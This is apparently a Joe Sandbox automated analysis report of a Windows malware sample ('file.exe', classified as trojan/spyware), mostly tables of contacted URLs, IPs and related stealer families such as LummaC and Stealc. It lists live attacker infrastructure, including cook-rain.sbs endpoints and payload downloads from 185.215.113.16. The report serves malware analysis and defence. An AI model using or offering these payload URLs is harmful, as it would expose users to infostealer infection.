                                                      https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2023-0chromecache_87.7.dr, chromecache_97.7.drfalse
                                                        high
                                                        https://aka.ms/msignite_docs_bannerchromecache_87.7.dr, chromecache_97.7.drfalse
                                                          high
                                                          https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-b4da8140-92cf-421c-8b7b-e471d5b9chromecache_97.7.drfalse
                                                            high
                                                            http://polymer.github.io/AUTHORS.txtchromecache_87.7.dr, chromecache_97.7.drfalse
                                                              high
                                                              https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.ymlchromecache_105.7.drfalse
                                                                high
                                                                https://cook-rain.sbs/6n(file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://cook-rain.sbs/qnfile.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                unknown
                                                                https://management.azure.com/subscriptions?api-version=2016-06-01chromecache_87.7.dr, chromecache_97.7.drfalse
                                                                  high
                                                                  https://cook-rain.sbs/ifile.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337538381.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317141941.000000000135B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.mdchromecache_105.7.drfalse
                                                                    high
                                                                    http://x1.c.lencr.org/0file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://x1.i.lencr.org/0file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://aka.ms/pshelpmechoosechromecache_87.7.dr, chromecache_97.7.drfalse
                                                                          high
                                                                          https://aka.ms/feedback/report?space=61chromecache_105.7.dr, chromecache_106.7.drfalse
                                                                            high
                                                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://cook-rain.sbs/~nfile.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: malware
                                                                              unknown
                                                                              http://185.215.113.16/Tnfile.exe, 00000000.00000003.2487089151.0000000001367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: phishing
                                                                              unknown
                                                                              https://learn-video.azurefd.net/vod/playerchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                high
                                                                                https://twitter.com/intent/tweet?original_referer=$chromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                  high
                                                                                  https://github.com/gewarrenchromecache_105.7.drfalse
                                                                                    high
                                                                                    http://185.215.113.16/off/def.exepleWebKit/537.36file.exe, 00000000.00000002.2616662668.0000000000EFA000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2291397449.00000000059A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://polymer.github.io/CONTRIBUTORS.txtchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                          high
                                                                                          https://www.mozilla.orfile.exe, 00000000.00000003.2291262413.000000000577D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://go.microsoft.cofile.exe, 00000000.00000002.2618573152.0000000004901000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://cook-rain.sbs/rofile.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317125677.0000000001366000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342127715.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2401701354.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317070340.000000000135E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356244934.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356504947.000000000136A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: malware
                                                                                            unknown
                                                                                            https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.mdchromecache_105.7.drfalse
                                                                                              high
                                                                                              https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725chromecache_105.7.drfalse
                                                                                                high
                                                                                                https://client-api.arkoselabs.com/v2/api.jschromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                  high
                                                                                                  https://aka.ms/MSIgniteChallenge/Tier1Banner?wt.mc_id=ignite24_learnbanner_tier1_cnlchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                    high
                                                                                                    https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prevchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                      high
                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://github.com/Thrakachromecache_105.7.drfalse
                                                                                                          high
                                                                                                          https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://polymer.github.io/PATENTS.txtchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                high
                                                                                                                https://aka.ms/certhelpchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                  high
                                                                                                                  http://185.215.113.16/steam/random.exefile.exe, 00000000.00000003.2487332602.0000000001343000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2616863520.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496752688.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://cook-rain.sbs/file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://github.com/mairawchromecache_105.7.drfalse
                                                                                                                            high
                                                                                                                            http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://schema.orgchromecache_97.7.drfalse
                                                                                                                                high
                                                                                                                                http://polymer.github.io/LICENSE.txtchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2291397449.00000000059A6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://aka.ms/yourcaliforniaprivacychoiceschromecache_105.7.drfalse
                                                                                                                                          high
                                                                                                                                          https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://github.com/nschonnichromecache_105.7.drfalse
                                                                                                                                              high
                                                                                                                                              http://185.215.113.16/file.exe, 00000000.00000003.2487089151.0000000001367000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://github.com/adegeochromecache_105.7.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://cook-rain.sbs:443/apifile.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://cook-rain.sbs/&file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242304214.0000000001354000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2242704780.0000000001354000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2243356851.0000000001354000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        unknown
                                                                                                                                                        http://185.215.113.16/off/def.exe4file.exe, 00000000.00000003.2487332602.0000000001343000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2616863520.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496752688.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: phishing
                                                                                                                                                        unknown
                                                                                                                                                        https://cook-rain.sbs/L#ufile.exe, 00000000.00000003.2337538381.000000000135C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                        unknown
                                                                                                                                                        https://github.com/jonschlinkert/is-plain-objectchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3file.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2290407248.0000000005781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://octokit.github.io/rest.js/#throttlingchromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://github.com/js-cookie/js-cookiechromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://185.215.113.16/off/def.exefile.exe, 00000000.00000003.2487332602.0000000001332000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2487332602.0000000001343000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2616863520.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496752688.000000000133F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schema.org/Organizationchromecache_105.7.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://cook-rain.sbs/-xfile.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317048532.000000000135A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2337538381.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2266013955.000000000134D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317141941.000000000135B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317025670.0000000001355000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317633873.000000000135C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2317211761.000000000135B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      • Avira URL Cloud: malware
                                                                                                                                                                      unknown
                                                                                                                                                                      https://channel9.msdn.com/chromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://cook-rain.sbs/)nfile.exe, 00000000.00000003.2314759201.000000000134F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2289658698.000000000134B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2314382076.000000000134F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: malware
                                                                                                                                                                        unknown
                                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2243153971.000000000578A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://cook-rain.sbs/Fnfile.exe, 00000000.00000003.2401701354.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356244934.000000000136C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356504947.000000000136A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          unknown
                                                                                                                                                                          https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctafile.exe, 00000000.00000003.2291709634.000000000574E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://github.com/dotnet/trychromecache_87.7.dr, chromecache_97.7.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                              13.107.246.42
                                                                                                                                                                              s-part-0014.t-0009.t-msedge.netUnited States
                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              142.250.185.228
                                                                                                                                                                              www.google.comUnited States
                                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                                              13.107.246.45
                                                                                                                                                                              s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                              185.215.113.16
                                                                                                                                                                              unknownPortugal
                                                                                                                                                                              206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                              239.255.255.250
                                                                                                                                                                              unknownReserved
                                                                                                                                                                              unknownunknownfalse
                                                                                                                                                                              188.114.96.3
                                                                                                                                                                              cook-rain.sbsEuropean Union
                                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                                              IP
                                                                                                                                                                              192.168.2.6
                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                              Analysis ID:1559964
                                                                                                                                                                              Start date and time:2024-11-21 08:29:08 +01:00
                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                              Overall analysis duration:0h 6m 53s
                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                              Report type:full
                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                              Number of analysed new started processes analysed:10
                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                              Technologies:
                                                                                                                                                                              • HCA enabled
                                                                                                                                                                              • EGA enabled
                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                              Sample name:file.exe
                                                                                                                                                                              Detection:MAL
                                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@24/61@7/7
                                                                                                                                                                              EGA Information:Failed
                                                                                                                                                                              HCA Information:
                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 192.229.221.95, 199.232.214.172, 184.28.89.167, 142.250.185.163, 142.250.185.110, 173.194.76.84, 95.101.150.2, 34.104.35.123, 142.250.181.234, 172.217.16.202, 216.58.206.42, 142.250.184.234, 142.250.186.42, 142.250.186.138, 142.250.186.74, 172.217.23.106, 216.58.212.170, 172.217.16.138, 172.217.18.106, 142.250.185.74, 142.250.186.106, 142.250.184.202, 172.217.18.10, 142.250.74.202, 2.22.242.139, 2.22.242.82, 216.58.212.131
                                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, learn.microsoft.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, client.wns.windows.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, wcpstatic.microsoft.com
                                                                                                                                                                              • Execution Graph export aborted for target file.exe, PID 3180 because there are no executed function
                                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                              • VT rate limit hit for: file.exe
                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                              02:30:10API Interceptor81x Sleep call for process: file.exe modified
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              13.107.246.42https://protect-us.mimecast.com/s/FVibCzpzxLsxEMXAhgAOBCGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • www.mimecast.com/Customers/Support/Contact-support/
                                                                                                                                                                              http://border-fd.smartertechnologies.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • border-fd.smartertechnologies.com/
                                                                                                                                                                              https://protect-us.mimecast.com/s/4MrPCrkvgotDWxrNCzxa8pGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • www.mimecast.com/
                                                                                                                                                                              13.107.246.45https://pcefan.com/diary/index.php?st-manager=1&path=/click/track&id=4973&type=ranking&url=http://nam.dcv.ms/BxPVLH2cz4Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • nam.dcv.ms/BxPVLH2cz4
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              s-part-0014.t-0009.t-msedge.netSalary 2025- workers-v1.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              Credit_DetailsCBS24312017915.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              https://www.amtso.org/check-desktop-phishing-page/Get hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              INVOICE DUE.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              PO-54752454235.htaGet hashmaliciousRemcosBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              http://frenzelit.powerappsportals.comGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                              • 13.107.246.42
                                                                                                                                                                              cook-rain.sbsfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.97.3
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 188.114.96.3
                                                                                                                                                                              s-part-0017.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              17321442093b7efcab383e800ce7d48a843c02e132542886b8b8918e7e8cfcc51ec7dd418b419.dat-decoded.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSSecured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 52.98.178.146
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              Encrypt DOC2024.11.20.1983928 shared with you!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 52.109.32.46
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                              https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 52.155.5.177
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.60
                                                                                                                                                                              MICROSOFT-CORP-MSN-AS-BLOCKUSSecured Audlo_secpod.com_1524702658.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 52.98.178.146
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              Encrypt DOC2024.11.20.1983928 shared with you!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 52.109.32.46
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              E89hSGjVrv.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                              • 94.245.104.56
                                                                                                                                                                              https://docusign685420961463outlook99742742685.glitch.me/#cGFsdmEwMUBtc24uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                              • 13.107.246.45
                                                                                                                                                                              x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                              • 52.155.5.177
                                                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                              • 13.107.246.60
                                                                                                                                                                              WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                              • 185.215.113.206
                                                                                                                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
